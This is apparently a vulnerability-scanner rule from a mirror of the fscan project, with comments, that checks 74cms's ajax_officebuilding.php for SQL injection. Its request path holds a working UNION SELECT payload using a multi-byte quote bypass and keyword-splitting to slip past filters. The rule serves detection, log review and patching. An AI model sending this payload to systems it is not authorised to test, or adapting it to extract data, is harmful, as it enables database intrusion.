mirror of https://github.com/qwqdanchun/fscan.git
# Detection rule; the name suggests it is a second SQL-injection check for
# 74cms. It sends a single GET request and reports a hit only when the
# response shows that an SQL expression placed in the `key` query parameter
# was evaluated by the database.
name: poc-yaml-74cms-sqli-2
set:
  # Random integer drawn per run between the two bounds. Its MD5 is the
  # marker searched for below, so a response stored from an earlier run
  # (different number) will not contain it.
  rand: randomInt(200000000, 210000000)
rules:
  - method: GET
    # Target: /plus/ajax_officebuilding.php with act=key. The `key` value is a
    # UNION SELECT of nine columns whose fourth column is md5({{rand}}); it
    # only selects a computed value.
    # NOTE(review): the multi-byte character before %27 and the `<>` placed
    # inside the SQL keywords presumably depend on how the application
    # escapes quotes and filters input - confirm against the linked write-up.
    # Log/WAF review: this request shape (this path, act=key, SQL keywords and
    # `md5(` inside `key`) is what to look for in web-server access logs.
    path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
    # Hit condition: the response body contains the MD5 of `rand`. The request
    # carries only the number, never the hash, so an application that merely
    # echoes the query string does not satisfy this check.
    # There is no status-code condition: any response whose body contains the
    # hash counts as a match.
    # A match means `key` reaches an SQL statement without parameter binding;
    # the durable fix is a parameterized query on that code path.
    expression: |
      response.body.bcontains(bytes(md5(string(rand))))
detail:
  author: rexus
  links:
    # Reference cited by the rule author.
    - https://www.uedbox.com/post/30019/